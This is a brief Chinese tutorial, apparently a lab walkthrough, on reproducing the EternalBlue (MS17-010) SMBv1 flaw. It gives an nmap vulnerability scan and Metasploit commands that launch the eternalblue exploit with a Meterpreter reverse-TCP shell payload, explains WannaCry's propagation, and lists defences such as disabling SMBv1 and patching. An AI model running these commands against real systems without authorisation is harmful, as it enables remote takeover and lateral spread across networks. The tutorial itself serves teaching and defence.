永恒之蓝漏洞复现

永恒之蓝(MS17-010)完整复现:SMBv1 远程代码执行、利用步骤、传播机制、防御加固。

写在前面:合法学习边界

永恒之蓝攻击只在授权测试环境进行。对非授权目标利用 MS17-010 可能触犯法律。

一、永恒之蓝攻击链

永恒之蓝攻击链
1
① 扫描 SMB 端口 → ② 发送恶意 SMB 包 → ③ 内存破坏 → ④ 执行 Shellcode → ⑤ 横向传播

二、利用步骤

1
2
3
4
5
6
7
8
# nmap 扫描
nmap -p445 --script=smb-vuln-ms17-010 target

# metasploit 利用
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS target
set PAYLOAD windows/x64/meterpreter/reverse_tcp
exploit

三、传播机制

1
2
WannaCry 勒索病毒利用永恒之蓝传播
自动扫描内网 SMB 端口 → 自动利用 → 自动加密文件 → 索要比特币

四、防御加固

1
2
3
关闭 SMBv1 · 打 MS17-010 补丁
防火墙关闭 445 端口
监控异常 SMB 连接

五、小结

永恒之蓝是 SMBv1 的远程代码执行漏洞,可导致整个内网沦陷。防御核心是关闭 SMBv1 + 打补丁